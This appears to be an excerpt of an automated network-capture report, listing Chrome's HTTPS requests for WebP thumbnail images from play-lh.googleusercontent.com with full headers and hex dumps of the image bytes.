                                                                                                                                                                                                                                Data Ascii: XIY4B,>,HZ)lT1vA4?p@2=8|:-Qo_Bjx)@xg:4#+Npq&K}W=${8M(pbWrYr[-Tfk>3f,nn T;<qu5D#Qn$$-
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 81 b3 16 a0 cb 62 ad 03 bf 02 c3 37 67 46 8a 90 cb 43 0e a3 c5 b9 2c 9d 00 ed 0a 61 2b 0e c5 39 d5 f9 75 ca d6 14 46 33 45 08 d5 f4 c7 45 9c 26 bf f2 89 bb 83 ce 53 8a 29 4c 1d 80 51 43 19 9a 9f 90 5a 42 fd 79 5a 00 a7 f9 bb 6d 2d fe 8a af 70 d0 05 89 fa a3 ee 28 3c 01 aa 8f 38 93 0a 49 1e 54 e8 6d fe 10 84 8a a1 db 20 d6 7d ef cf d7 d3 36 57 9c d0 b2 c2 af c3 db 97 be 16 e6 33 06 12 3b cb be 61 94 7f 6f 8a da c1 b7 fa 72 55 e8 22 8f 10 09 c4 bb 55 4c ab 57 78 b2 13 3d 62 0f 10 e1 3d e1 cc c4 4d 6b e7 72 bb 9f f7 3a f1 9d e3 ea df b7 a7 66 4a 97 1a 3b 4d d7 95 e2 4c 9b 5f 05 56 22 85 9e 44 d7 26 b6 a6 b2 17 82 70 78 6b 8d de 97 16 5b 93 eb 09 08 3a da 29 a5 a5 59 1a 64 61 6b 0f af 99 37 19 67 77 c7 29 21 6c 8e d7 ac e2 41 cf 22 d4 80 6c 49 5b ed 11 e5 3f
                                                                                                                                                                                                                                Data Ascii: b7gFC,a+9uF3EE&S)LQCZByZm-p(<8ITm }6W3;aorU"ULWx=b=Mkr:fJ;ML_V"D&pxk[:)Ydak7gw)!lA"lI[?
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: e3 84 c7 b4 ed 5c 51 64 29 32 27 88 c1 fa 45 b4 85 39 d4 ba 68 23 1d 33 00 40 07 5d c8 a6 ca 4c db c3 d8 7c 71 6b fd a7 19 a3 ce b9 46 b4 d7 c1 3e 0a e1 a8 3a bd 81 d6 af af ac 7d b6 06 43 69 3e 7c ca 84 23 aa df f9 cc e7 af a9 15 41 35 c9 97 c4 b1 39 21 29 16 32 13 5e 95 67 52 48 14 06 de fa 7c d7 d7 6c 38 18 58 8d f1 0a 52 92 f6 38 d6 ae fd 90 a5 99 a0 91 df 30 de 37 ed 8b 42 a4 e3 47 0f 52 a0 c3 22 7b bd 48 24 c0 07 01 82 25 e5 89 7a 55 b0 69 a8 4e 5d 12 c3 ed 72 8b 0a e6 e3 7e 4a 99 42 72 79 2d 68 9a 4f 4e d1 3e b4 5f f1 9f c1 43 0f 6d 23 69 dc e0 1f ca 27 64 53 37 0a e9 ef 44 38 42 15 26 97 dc c4 7a 8a 0f 27 13 5c fd 1d b1 18 19 08 e7 c2 13 50 26 83 fa 01 09 29 d3 2f dc 56 8f 0f 16 08 94 87 fe aa 03 00 17 a0 51 84 8a c2 7f 83 5e de ce 19 bd 68 cb f1
                                                                                                                                                                                                                                Data Ascii: \Qd)2'E9h#3@]L|qkF>:}Ci>|#A59!)2^gRH|l8XR807BGR"{H$%zUiN]r~JBry-hON>_Cm#i'dS7D8B&z'\P&)/VQ^h
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 5c 1c 6b 3a d6 75 1d 15 54 86 e8 d9 2d e3 6c 3f b6 f5 29 a0 d4 73 83 63 53 39 c8 8b ba 66 a9 ee ad 21 96 a8 99 ec c9 fb 2d 34 02 da 0c a6 db 88 69 57 89 76 cb d3 b2 c3 8b ab ca e1 67 d0 b2 bd 5b 58 89 39 7c 15 a9 cd 10 3f 44 7e 9e d9 8d b2 76 7a 96 ba cc 70 78 34 bc 80 9d c1 04 d6 a4 a1 e3 d4 71 31 fa c2 7f 0b f7 9b e6 b0 e8 bc a2 11 68 76 89 cb a3 20 4c a0 ad fc 2d d1 3f e1 92 37 ab 8c aa 02 1c 29 57 cf 6b 49 20 87 a9 d3 ce 2a 15 f1 82 3d 7b af 41 4f f2 4c ea d3 67 40 8b ea dd f9 7f 11 7a 9c 16 d9 04 4c e8 fb e3 25 a2 04 a1 ef 63 a9 fb 72 52 38 e6 8a 04 58 5c 3f ae 24 56 ad ff c9 32 7b 8e 87 9d e3 03 a9 65 60 ae 2c 10 d9 ac 5b bd da bd 9d fe 4d c7 93 34 82 3b 60 b6 73 cf 52 ab b9 d4 95 f9 dd 86 91 26 63 2f 6c ed c8 76 3d ad 07 f9 bc 73 ef 5b b5 8a 5b 73
                                                                                                                                                                                                                                Data Ascii: \k:uT-l?)scS9f!-4iWvg[X9|?D~vzpx4q1hv L-?7)WkI *={AOLg@zL%crR8X\?$V2{e`,[M4;`sR&c/lv=s[[s
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC264INData Raw: 49 1a 3d cd 76 b7 3b 30 8f e2 86 b8 fb a7 66 0a 63 0f 09 e1 89 97 40 9c f0 e8 3f 3a 75 0d 67 eb 05 aa 43 36 d1 50 c4 eb 76 1b 16 07 fd 1e 6f 00 14 92 87 2d 81 8e 26 46 a8 b6 cf 60 b1 6a b8 89 40 af f2 0c a7 6e e3 d2 de 2f 9e 4e 29 06 de 8e 10 31 9f 5e 6c d4 0c 2a 17 d9 81 29 79 c5 ef 15 9d e9 64 07 7d ba 47 23 d7 2c c1 1d 28 b7 72 3c e3 a4 bf cd d0 1c 17 49 37 72 1f a7 ce 85 d2 04 b9 92 eb f3 8b 7f f5 68 00 5d 96 f9 c0 99 40 a0 05 4a f9 d9 b4 7c c8 12 ca fd 99 b5 fb 6a bb 82 e3 b1 45 c4 da 22 65 7d 80 ae db a0 8a e1 5b bd c0 41 29 a0 52 3f 8b ee 64 00 46 f1 a3 bd 2d 39 fb 72 d6 7e 20 1e 6e f3 ab e3 c6 64 19 ef 9b 35 00 dc 03 d5 b8 48 77 83 c4 a0 00 03 70 2b 9a d7 f9 a7 ff 9f 2c f1 8d 45 68 96 2f b7 cb 56 6c a9 dd 28 03 fc 90 57 55 57 2f 7e 7e f1 14 09 56
                                                                                                                                                                                                                                Data Ascii: I=v;0fc@?:ugC6Pvo-&F`j@n/N)1^l*)yd}G#,(r<I7rh]@J|jE"e}[A)R?dF-9r~ nd5Hwp+,Eh/Vl(WUW/~~V


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                113192.168.2.450002142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1099OUTGET /JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 10246
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 5900
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC856INData Raw: 52 49 46 46 fe 27 00 00 57 45 42 50 56 50 38 20 f2 27 00 00 f0 90 00 9d 01 2a a6 00 28 01 3e 55 24 8f 45 23 a2 21 13 ea 86 b4 38 05 44 b2 37 6e bd c0 30 da 01 1f a8 7e 5d 77 a7 77 ff 21 f8 e1 fc f7 f5 ef e6 1a ce fe 63 fb 67 e9 5f dd 0e 70 d3 61 d9 ef ec 3f 32 ff b8 7c b8 ff 1d ff 13 fa a7 bb cf d2 9f f4 bd c0 3f 4e 3f d7 ff 52 fc 6f f8 b7 f5 a9 fb 95 ea 1f f9 b7 f7 1f fb df de fd dd ff d6 7e c0 7b b2 fe e3 ea 07 fd 5f fb c7 ac 77 fa ef ff fe e5 7f b5 de c1 5f cd 3f cd 7f f5 f5 cb fd d5 f8 36 fe b9 fe f7 f7 4b e0 5f f6 53 fe ff b0 07 ff 5f 50 0f fc dd 61 fd 73 fe a7 da cf f8 2f ca 1f 3c 7c 5f fa 3b f7 4f dc 7f f0 5e da d8 eb b4 9f e5 5f 78 ff 45 fd c7 f7 1f d8 bf f8 7e 1a fc 6a ff 03 d4 3b f1 df e6 ff e5 bf 35 b8 94 76 cf f5 df f6 bd 45 fd 95 fa 9f fb 0f
                                                                                                                                                                                                                                Data Ascii: RIFF'WEBPVP8 '*(>U$E#!8D7n0~]ww!cg_pa?2|?N?Ro~{_w_?6K_S_Pas/<|_;O^_xE~j;5vE
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: bd bf d3 8a 60 d4 9f ee a0 6f 4d 4a 44 e1 7c b1 5a 26 88 17 ef 91 b3 74 2d 79 d3 54 d0 c3 15 67 4a 39 20 9b 5e 6a 4d bf 6e aa 3b ef 59 a7 13 ec 49 dd 43 1c cd 7b 2a fc 73 75 5b a2 f8 c1 aa 6c b6 69 42 6f 39 ec 0b cd 72 df 9f b5 4e da 40 6b b9 8d cb 7b 6c 3f ef 94 c7 27 fa cb 24 a3 f0 56 3b 44 49 1a fa 52 97 37 58 aa 7c 93 07 4c 25 c7 93 38 8a 7f 02 e1 c0 c8 15 2c 82 af a9 18 ec 57 2b 85 0e eb 9a ab 58 2c 73 77 70 3e 6c 0d 59 ca b7 a0 74 ae 2c a8 a0 52 84 de dc 55 e5 43 fd 2a 07 b1 65 60 49 96 19 60 b3 d3 39 66 89 b3 46 6f 9b dd fd d0 b6 21 f7 01 1a aa 60 bd 9c 8b 4a 13 77 e4 de 34 b2 1d d1 e6 d7 dd 19 8c 8d 67 fd 5a e6 c2 79 65 ff 0c a4 c0 6b b5 9b b1 9a 5d 22 fb 1c 16 17 1d 74 21 2c d3 2b 99 d2 f8 99 58 5c 66 df 3d 91 7d cf c1 ad 02 dd ff be bb 96 73 c8
                                                                                                                                                                                                                                Data Ascii: `oMJD|Z&t-yTgJ9 ^jMn;YIC{*su[liBo9rN@k{l?'$V;DIR7X|L%8,W+X,swp>lYt,RUC*e`I`9fFo!`Jw4gZyek]"t!,+X\f=}s
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: ea f2 94 e6 3d a6 fa 21 73 5d 45 c9 39 39 44 7a e0 80 b5 62 85 01 76 3c 80 a2 99 f5 95 1e 46 dc c1 48 8c d7 46 72 a6 5b 78 21 ae 9d 59 d4 35 d3 6f 61 16 2a a1 ce f2 f4 6d 2f 88 17 fa f9 c8 d1 15 f4 eb 5d 64 25 5a e3 fe 8f 26 6f 01 d8 01 71 b1 72 8e 57 8a e6 34 06 64 45 07 a8 49 95 7b 35 38 7c 34 4f a3 9d 7e f5 ee d5 dd 69 0a 57 42 d1 ad 9d 17 80 ec 32 10 6b c0 e0 52 40 dd 51 ed 6d f9 6d 3a 0d 5b d6 1c 54 ae 48 eb 3f 2c cc 69 1d 86 95 a0 21 9b c7 b6 b3 f5 ad 17 96 64 2f 88 a6 d1 8f e5 a9 45 85 5c be 4f f2 26 0a d0 a0 87 d4 ab 72 ad 7f ec cf ab 60 77 af ff 51 43 fb 30 b1 11 38 f2 09 02 03 80 52 15 c4 e5 e3 e4 08 36 ba fd 84 1f 3f c6 84 7b 4e c0 4c 35 6a 58 b5 74 96 ea b4 75 af ee e8 2e 44 a1 8b 98 13 2d 2f 28 4d d5 89 34 77 b5 d2 ab d6 6b e7 dd 17 df dd 25
                                                                                                                                                                                                                                Data Ascii: =!s]E99Dzbv<FHFr[x!Y5oa*m/]d%Z&oqrW4dEI{58|4O~iWB2kR@Qmm:[TH?,i!d/E\O&r`wQC08R6?{NL5jXtu.D-/(M4wk%
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 6d 65 cb d1 66 81 23 64 6f 5b c1 8d 3d 61 de 82 9f 80 51 8c dd 0b a6 dd 37 6c 7d aa 19 63 20 a8 51 ba 4c d5 9f 3d e6 b4 5f e5 ff 9a 77 48 ef ed 2e 77 18 92 76 0f 7c 31 e4 77 88 2c 74 29 37 d8 5d 43 17 8a a1 12 d4 1c f8 bf 20 e9 c0 b1 62 94 b9 af df c0 2d 20 6d c1 d4 24 91 f1 31 8a 8c 52 ba 81 e1 29 7e 02 39 00 72 41 b8 06 b0 87 ba 22 5b 27 fe 4f 9e 5a 6d 23 fb 64 86 d1 16 32 07 8f 0a 9f 14 c1 ee 0e 93 1e 3c 5a 92 27 13 47 b8 c6 f5 b0 ba 94 31 bf 0b 3e df d2 1e 47 05 9f b2 10 c1 ec 2d 22 29 63 12 85 cc 67 d1 5c b3 a2 5a 1b a1 fe a8 f7 80 c7 10 06 71 61 23 86 70 0d 4d f9 83 b4 4f d5 2f 45 bc d5 71 66 13 f1 5e e5 54 4d 47 32 cb 37 e5 22 f9 b5 ab 03 ba 09 8c a7 6d 3d 8c fd c4 60 8c 58 7c e4 4f ee ff 61 89 04 d6 ac 9b 81 2a b5 97 cd ca 8a c1 df cd 31 9e a4 69
                                                                                                                                                                                                                                Data Ascii: mef#do[=aQ7l}c QL=_wH.wv|1w,t)7]C b- m$1R)~9rA"['OZm#d2<Z'G1>G-")cg\Zqa#pMO/Eqf^TMG27"m=`X|Oa*1i
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 91 75 17 b2 a2 23 b7 cb 7c 05 49 d0 0e 0f bd b8 83 65 d2 15 40 44 29 95 a5 96 43 e3 e9 69 dd 87 55 c3 2f 40 a7 b2 8b e3 1a d5 1e 64 a9 9c 41 87 a4 05 53 2c 6c 50 17 70 b1 4a 7a 76 3a 4d 50 53 6a f7 97 c1 65 ac 57 70 87 5f 26 6e 4a aa fd 4b 5e 41 80 de f3 29 01 b8 1d 54 b9 72 53 1d 56 dc 3a 3c 16 84 b2 34 a4 3f 1f 62 46 39 1c ca 5c 74 66 38 e2 f5 4d 39 90 95 59 0e 9a 57 30 57 e4 0a 6d 54 4a c8 32 1d 5b e1 89 3b 99 01 b4 b3 2d 6a 0b eb 1f 0d 92 40 a1 ae 53 24 e5 6f 71 b3 de 84 52 83 72 68 d8 37 02 51 0a fa b8 94 a0 a3 85 cd 1d 49 93 26 ff ac 3b 03 95 bf c8 15 c0 52 d1 18 3b b6 51 7a 9f 70 c0 0a a8 fc d2 2f 1b d8 e8 81 0a 1e 8d 81 83 9c e3 e6 09 eb c4 f7 ac d0 5a 33 33 66 67 39 de 7f 01 f8 7f a7 c4 c5 f1 95 94 05 90 d9 43 f4 c4 fe 0b e7 e4 7b 0f b2 85 39 bb
                                                                                                                                                                                                                                Data Ascii: u#|Ie@D)CiU/@dAS,lPpJzv:MPSjeWp_&nJK^A)TrSV:<4?bF9\tf8M9YW0WmTJ2[;-j@S$oqRrh7QI&;R;Qzp/Z33fg9C{9
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 64 ac de 00 45 d0 5f da 30 7d 15 4d ea 33 a9 9d 2c 51 62 57 c2 9c e7 44 53 d3 87 26 74 37 d6 d3 ae b1 34 4b 34 72 42 b1 61 0c 34 bc 96 7d 45 a7 39 95 f1 0c 98 8f 1d c2 6d f2 a5 08 69 c2 c3 a7 69 4e 89 aa 21 77 42 33 bd f9 94 da fc 7f 68 b2 f2 95 41 cd 66 02 bb c0 3f 91 39 d6 bf 79 7a 6a 73 dc 3f 43 5b 9f 25 bc 81 34 ac 0c aa 21 e5 e1 9d 8b 1a 5c a3 fd de 69 ae c3 f7 a8 f2 3d af 8a a4 63 84 f0 23 b8 de 6a f6 40 94 63 ef 46 f6 0e da f7 d4 14 fb 67 9b d8 63 c5 86 fe 25 98 cc 52 a3 b1 e2 3d 4c d3 40 d5 be ea ce 42 fb 3a 77 ee 8e 91 d0 f4 22 76 2a 13 6b 6e c6 f4 ce d3 8f d2 26 f2 49 b3 90 df cc 7f ad d6 79 3f a2 f5 b1 ce 90 ac 28 2f 0b 0e e4 65 d8 9f 1b 76 f8 53 d0 99 72 7e f8 8c 8a 27 cf c1 db a4 64 b6 be 37 b5 37 e4 97 56 cc b7 ca 8e 35 f2 be 6e 13 dd 95 f2
                                                                                                                                                                                                                                Data Ascii: dE_0}M3,QbWDS&t74K4rBa4}E9miiN!wB3hAf?9yzjs?C[%4!\i=c#j@cFgc%R=L@B:w"v*kn&Iy?(/evSr~'d77V5n
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 30 97 93 a6 fe 56 c3 9c c5 47 16 0b 1f cb 3c 9d de b7 27 9d f7 47 38 c0 d2 10 aa 79 d4 0d 20 5e f2 ca 4f 05 c1 3e 35 a7 4d 25 50 f1 08 4b d6 d6 43 09 76 79 bd 51 65 3e 8c 3a e7 da e3 81 2e e2 41 4f 73 54 c4 ce 13 1d b1 e7 a5 66 55 e8 8b ea 8b 40 e7 58 33 93 81 ad 69 0e 1c 24 2e 49 34 c2 bb c8 2a 14 a1 03 ae 34 98 19 84 8f cc a7 37 07 0e 6c b9 23 de e3 6e 03 60 03 a5 f7 fd 80 3d 19 1a 77 f8 51 c1 9d c8 0a fc f2 d4 b4 76 16 f6 13 89 64 d4 b6 6e 86 09 20 ef 01 83 d5 54 93 b0 52 36 60 47 2b e5 fa 46 6d 5e 98 c7 7f 97 3d c5 8e 07 58 f4 f9 b7 aa 4f 8f 43 80 88 be d6 7d ab 9e 08 a7 10 de 45 11 4b 36 d5 25 51 14 e0 ea 84 d2 69 8c 66 fc 29 ce 5f 53 2d 31 eb 16 bc 49 fa 4c d6 00 2a 56 c2 e9 fa f0 f9 19 93 e4 03 a0 98 52 5d 8d 94 64 bf f9 4f d3 60 34 b9 4a 48 e0 3e
                                                                                                                                                                                                                                Data Ascii: 0VG<'G8y ^O>5M%PKCvyQe>:.AOsTfU@X3i$.I4*47l#n`=wQvdn TR6`G+Fm^=XOC}EK6%Qif)_S-1IL*VR]dO`4JH>
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1050INData Raw: 81 e2 d4 56 37 69 33 dc 60 84 84 04 74 3b ff e2 fa 67 fa 6a 2e 61 43 16 af 94 ea 80 2d ee 2c 85 ce c2 0e 44 ca d2 f3 96 8c 43 29 bd 94 b9 33 77 38 a5 c3 2f 14 47 25 14 4c b8 b3 c6 e0 1c 03 ac 7f 5c 73 9f a6 a9 bd 36 24 68 64 d9 9b 02 7b 53 88 ff 73 96 6d 23 1e 7e aa 1e 86 5e 66 59 3b 25 4c bf 75 40 9e dd 40 aa ba 87 32 08 59 ba 26 6f 11 6d c3 0b 3d 18 f0 0b a3 88 7c fb 42 b5 a8 3c 8d 78 d8 a2 8f c1 9d e5 97 f9 26 f4 12 0d d2 7c 3f 82 2d fc 5c 06 42 64 94 e8 09 9e 70 94 69 47 b7 01 54 ea 35 ea a1 5a 6e 64 f3 c9 af e6 cc 26 38 92 50 e7 9f 93 00 79 5d 7e c5 dd 5f 13 bb a8 f4 d1 48 ee 91 b0 ca bb 59 f5 2a 1c ea e6 0c cc bb 90 7e 31 25 90 08 67 40 06 36 c7 31 2d 1b 7c 20 57 a3 57 17 23 e7 6f 9e b4 dc 1e f3 34 a6 e0 b6 86 7f 95 b2 df dd a0 7b e0 da e0 3c c5 99
                                                                                                                                                                                                                                Data Ascii: V7i3`t;gj.aC-,DC)3w8/G%L\s6$hd{Ssm#~^fY;%Lu@@2Y&om=|B<x&|?-\BdpiGT5Znd&8Py]~_HY*~1%g@61-| WW#o4{<


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                114192.168.2.450001142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1097OUTGET /_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 9204
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 5900
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC857INData Raw: 52 49 46 46 ec 23 00 00 57 45 42 50 56 50 38 20 e0 23 00 00 30 7e 00 9d 01 2a a6 00 28 01 3e 51 20 8d 45 23 a1 a1 15 e9 46 44 38 05 04 b1 01 d8 0f 36 9a bf e7 3f 23 bb de bd 1f 79 fc 8f fc a7 f9 86 b1 bf 76 fe d3 fa 4f fb 2f 24 95 95 e5 99 cb ff eb bf c2 fe 57 7c cf fe df ff 4b fc 77 f7 cf 83 df 9f ff f2 7b 81 7e 9f ff bf ff 09 fb 61 da 97 cc 4f f5 2f f1 df f5 ff c1 7b b9 ff bf fd 80 f7 45 fd ab d4 03 fa 1f f8 ff 58 ef f9 1f ff fd c9 bf bb 7f b4 ff ff ee 1f fc df fc 17 a6 a7 ed f7 c1 b7 f6 ef f8 7f b8 9f 02 7f af 9f f9 3f 74 bf ff fc 80 7f f1 f5 00 ff d1 ea 01 e9 af d8 4f ef 7d ba 7f 80 fc 9c eb bf f6 0f b5 7c c1 e2 65 f2 af b9 7f b0 f5 b5 fc 87 fc ef 0d fe 1e ff 9f ea 05 f9 67 f3 0f f2 9e 24 fb 76 34 bf dc 6f 50 5f 6d be 99 fe e7 fc 27 e4 7f a5 67 fb 7e
                                                                                                                                                                                                                                Data Ascii: RIFF#WEBPVP8 #0~*(>Q E#FD86?#yvO/$W|Kw{~aO/{EX?tO}|eg$v4oP_m'g~
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 05 d6 05 48 3a 23 ca fd 96 13 02 6c be 4e 6c ef c5 51 05 92 d9 34 44 52 6f 93 ed 8a f7 e8 8f e7 02 50 9b c3 35 b1 94 ed 24 d4 98 89 24 7a c9 99 ad cb b5 84 00 89 19 d9 c7 45 07 e4 76 73 8f 67 5b 71 f6 55 a7 8d 94 c9 72 08 76 3a de 90 28 e6 3e c9 d6 b8 64 47 78 b3 8d f9 ae 89 fa f7 71 e2 56 5c e0 88 0f f3 ee 45 82 6d 1b c7 8f e7 de 09 4a 84 31 df 22 2e d7 7f af b9 fd cd 3c ce b0 93 79 dd c6 15 a6 75 88 0a 1b de 66 33 aa 67 04 94 b5 c8 40 8c 81 52 73 04 6a 0c 1f ab c4 94 b3 2b 3f 55 03 67 b9 42 20 f3 a8 6f 94 5e 25 b4 93 e6 56 75 b0 9e e0 00 fe f6 55 da 20 2c fd 31 aa e7 f3 2a a1 ac f3 ba 88 73 c3 c0 00 04 f0 b4 18 fc 4c 71 73 93 5e d4 f3 31 dc 09 ba 62 89 b3 e8 b2 f2 62 92 e9 04 cb f3 5e ed 8e dd 3e b5 65 97 47 28 a7 9b 0e 0c 28 79 c5 4f 21 9a 65 b3 e1 c7
                                                                                                                                                                                                                                Data Ascii: H:#lNlQ4DRoP5$$zEvsg[qUrv:(>dGxqV\EmJ1".<yuf3g@Rsj+?UgB o^%VuU ,1*sLqs^1bb^>eG((yO!e
